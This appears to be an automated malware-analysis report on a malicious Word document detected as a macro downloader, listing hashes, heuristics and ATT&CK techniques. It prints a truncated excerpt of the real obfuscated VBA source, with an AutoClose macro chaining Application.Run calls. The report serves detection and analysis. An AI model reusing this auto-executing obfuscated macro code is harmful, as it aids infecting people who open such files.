Office (OOXML) malware analysis — malicious · 111bc2aed7502012

MALICIOUS

Office (OOXML)

59.0 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-05-31

MD5: 199ea4d0ad8418646866b2a2303855db SHA-1: 9e690ea18ce53d4904164181009aeb73328de645 SHA-256: 111bc2aed75020123b10b6082a67b5f51985dae15dd4abae7109ca7cbb577b15

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis revealed the presence of VBA macros, specifically an Auto_Close macro that uses CreateObject, indicating an attempt to execute code. The VBA code itself is heavily obfuscated but contains calls to Application.Run, suggesting it's designed to execute a secondary payload, likely downloaded from an external source.

Heuristics 6

ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	13499 bytes
SHA-256: `ce3f81c5e77af5dfd327a246ea0580e33df6f3619de233a8796c9a28608a06df`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub LqJvoKfPbxKkoH() irqWkSLOy = Atn(470.7) - Atn(956.84) - Atn(869.21) - Atn(554.68) - 854.21 XBKVGjY = 289.66 + Atn(148.69) + 671.88 HjOTVWWZ = "GIZFf" + "KzOxkDWQXnJxSB" + "NAuS" upycRfOgik = Atn(932.87) - 595.18 - Atn(146.38) - Atn(305.78) OrzHgRi = "uHqRoiRunqMOLgk" + Left("pWyJNoQEoN", 6) + "yEYRRcWvIxp" + Left("YbWjRQWfyN", 2) + Left("xzFdSTpHNp", 2) TbyxMfO = "jcgbiJWZXkuW" + "EXuLbvwviWkWcF" + "HESOUDSBN" LEKBqHgN = "y" + "SEPizWYvZqiPU" + LTrim("gqOHdVoFRWPpTxKCkSHHkBQCTQZANX") Application.Run "pDxcjpIWpwDZSu" WWbjjBMv = Atn(133.79) - Atn(288.96) - Atn(324.14) - Atn(834.5) LFMFLwfVfDrH = "fr" + RTrim("nguG") + "qbIQqxgCkiwqfFogIvcCRK" + LTrim("znnBnYcSr") FuxdTyPu = Atn(406.79) - Atn(279.11) - 417.16 ESjkHFqE = Atn(340.94) + Atn(932.99) kGYGIQGWKfPI = Left("WHOByCwJPp", 3) + "YJEo" + Left("UIfuYqXLGD", 5) ZuFTJugcNw = Left("nTCACzGyLY", 9) + Left("GLirSIggUX", 5) + "DLfjiSW" + "WcTuJgnbkwBT" cHYjfiygBwpK = "nTQyNQ" + Left("gIiWkvOvpx", 7) + Left("OvFvUZrEPn", 6) End Sub Sub OWFozFGyHIfuHG() yCqCFvGdbkKz = "xXuYYH" + "wSkuzDjNFdSqWx" + Left("uPPJUfzjxL", 7) zZDJxoFVd = 210.8 + Atn(857.9) + Atn(376.27) + 237.71 Application.Run "OvJCfVYjCpTxqPyw" TjTRyoWnJG = Left("gcXWurEjuc", 4) + "KMHyUXdBkKMU" bDWDHpD = "iDKKGDdKfLqTEYVYpSco" + "wxOMEYoWD" gppJJPoKxDLr = 916.3 + 402.59 + Atn(198.1) + Atn(775.35) HEpAJbjFPQ = "TEKF" + RTrim("LxyiUXTBbURPgQbAHQKrBACJkSLwL") + "CQJPEbvJrxrqNBoYvxwIdMzD" End Sub Public Function YcWJXvyFnDMQu(RoizIzPyJJBrzbzVTf, HBZCpkvEiCjNjxd, JqnVzkfRSFUOOwizD) FfBkBgzik = Atn(766.1) + Atn(257.19) + Atn(654.96) + Atn(924.89) AJQFgPyq = 552.27 - Atn(204.12) KTqvTyHHC = 260.2 + 70.1 + 379.29 YcWJXvyFnDMQu = Replace(RoizIzPyJJBrzbzVTf, HBZCpkvEiCjNjxd, JqnVzkfRSFUOOwizD) AbVbxGRy = 712.35 + 145.97 + 429.18 + 656.23 + 420.83 + Atn(815.18) TPLnWER = Left("QzFfdBLIib", 2) + Left("FXPEbNwdUH", 4) + Left("gGZnyjHfbS", 9) rfXuHUiAJD = 549.59 + Atn(57.9) + 486.88 + 53.77 + Atn(478.12) + Atn(979.78) NDjMXPI = 525.16 + 813.82 + 105.9 + Atn(999.74) + 585.97 + Atn(458.48) QRjgcJHvjWdP = 358.43 - 629.97 - 6.2 - Atn(711) - 459.7 - Atn(472.12) - Atn(467.65) - Atn(663.9) bwXJwzTSZV = "fvDRKcdfQNupgf" + LTrim("LDdkcfzSzz") + "XScpLGD" + "KUdIqLkHCivkdDbAoLn" JAkkxOofLG = Left("unCVDWZKRw", 8) + Left("vSfjoHAgSc", 6) uroncKu = LTrim("fbOjOXKAdoqkZ") + LTrim("F") + "uXTO" + "UEAOXJSPZOCgzWGJoORLTw" BuEpdFEUOxJ = 437.71 - 745.9 - Atn(137.63) gfBOFNCRKq = 388.3 - Atn(503.34) PXcwXbc = "xxbpHzrXx" + "OxTXxovMuOpfkMWGbupfCqCjIQ" + RTrim("PpUYYMKFDGEGnQdOAUv") End Function Sub pDxcjpIWpwDZSu() UpnRTqzIV = Left("wZFqjGGfzO", 3) + "HpQNZr" + Left("BWpKBqnzXU", 5) AZkUokWcX = 342.73 + 363 + Atn(491) + Atn(945.55) RqdFWGE = Atn(878.38) - Atn(504.27) - Atn(692.25) - Atn(909.43) - 123.4 PEMyyWrCSdp = LTrim("Tf") + "IZKRXffYbNcDvZPrQDZJWuV" + RTrim("ZEPokAf") + LTrim("ApQA") + LTrim("xyEQ") YknxcOjiKAX = Atn(648.51) - Atn(440.5) - Atn(951.61) - Atn(145.45) - Atn(495.1) HpMxnWiMX = "CffCkOJDHpgfXzARZIgRWLfKBYTAR" + RTrim("bfNyYbVFEGzyDPRKqdpGIy") + RTrim("YLdJYSvY") FUAnQFRb = 865.4 + Atn(568.23) Application.Run "kBRfkbCiIVNzgT" GoMMXfkvSf = RTrim("jOTuJMDpKdwSBJyJORfPNzyQgQR") + RTrim("CFNrRDCPA") + "BFqJAGC" + RTrim("InKQJKLfBBRdGNqIWbPdZAEpOHq") MNToCCHF = "ZUiXYIiIRxHOjSWOcrVKfx" + RTrim("QAFYUPKycSr") + "GfwI" AGPkjXY = "TwLLOuIZYxD" + Left("BwwITHfbAn", 5) + "JFbWiIoBfbX" End Sub Sub AutoClose() ZSINbyL = Left("VXNrvTHLWY", 10) + Left("zYfdOArcgE", 1) FgBduyyVfV = "RKqq" + "PcPJCPwzFU" + Left("OLziqcvNSu", 10) + Left("rrWBxOoBxw", 10) zQgGoyjyCGSD = Left("gvZjPYErwk", 1) + "nVIkpHNJV" + "yB" xKPDROn = Left("FFHVEbprCb", 6) + "nEiZnubxk" + "pPIw" + "xyARooFRu" Application.Run "ZyyirJIXvZTAby" uMJDyiPH = "vYBAMSW" + "DqGMFCOJULNxU" + "wCU" + Left( ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	38400 bytes
SHA-256: `dacdef69c4c7737ddaf7de97f6a3f5429e548cb21cb7b76d0a57da334046236f`
Detection ClamAV: Doc.Malware.Emooodldr-6711604-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.